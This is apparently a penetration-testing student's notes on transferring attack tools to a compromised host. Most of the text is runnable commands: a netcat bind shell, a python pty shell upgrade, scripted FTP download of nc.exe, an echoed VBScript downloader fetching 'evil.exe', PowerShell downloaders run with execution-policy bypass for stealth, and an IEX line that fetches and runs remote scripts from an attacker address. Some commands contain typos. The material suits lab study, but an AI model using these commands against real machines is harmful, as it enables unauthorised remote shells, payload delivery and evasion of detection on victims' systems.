Comment on page
Transfering Modules
Dangers of transferring attack tools:
we should try to use the native tools(victim's tools) for detection avoidance,
Installing Pure-FTPd
`` sudo apt update && sudo apt -y install pure-ftpd
``
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
systemctl restart pure-ftpd
non-interactive shell:
nc -lvnp 4444 -e /bin/bash
nc -vn 10.10.0.128 4444
----
netcat provides a non-interactive shell.
login to ftp account-> nothing happens(we're interacting in the background)
STDOUT is not correctly redirected in the basic bind or reverse shell.
you have to exit out.
---
Upgrading non-interactive shell.
python interpreter comes with pty module. we can use this process to spawn fully interactive shell
nc -vn 10.10.10.111 4444
**python -c 'import ty; pty.spawn("/bin/bash")' **
frtp 10.10.11.4
now we can interact!
Transferring Files with Windows host
Non-interactive FTP download
Assuming we already have a shell on the window's machine,
1. ftp --help
-s:filename specifies a text file containing FTP commands -> we could use this.
the idea is to create a text file with FTP commands in it.
2. in the /ftphome/ directory, place a netcat binary.
3. start the ftp server on kali
sudo systemctl restart pure-ftpd
4. create a text file with echo commands.
-echo open 10.11.0.4 21 >> ftp.txt
- echo USER offsec>> ftp.txt (USER)
- echo lab>> ftp.txt (PASS)
echo bin >> ftp.txt (binary transfer)
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
5. ftp -v -n -s:ftp.txt
-v suppress any return output
-n supress automatic login
VBScript
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
copy the window's version of wget to our root
cscript wget.vbs http://192.168.10.5/evil.exe evil.exe
this will download a file from our machine. (upload it to the victim's machine)
Easier
Remember since we only have a non-interactive shell we cannot start PowerShell.exe, because our shell can't handle that. But we can get around that by creaing a PowerShell-script and then executing the script:
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://192.168.1.101/file.exe" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
Now we invoke it with this crazy syntax:
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
-ExecutionPolicy Bypass
-noLogo -NonInteractive --- stealthly
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.119.146/gori.ps1')"
IEX(New-Object Net.WebClient).downloadString('http://192.168.119.146/gori.ps1')
1. On kali machine copy whatever you want to send to the web root (/var/www/html/) and start the apache server.
2. Useful scripts are in /usr/share/nishang
2. On the windows machine type the following command:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.10.128/unko.txt','C:\Users\Administrator\Desktop\transferme.txt')" powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.119.146/gori.ps1')"Last modified 1yr ago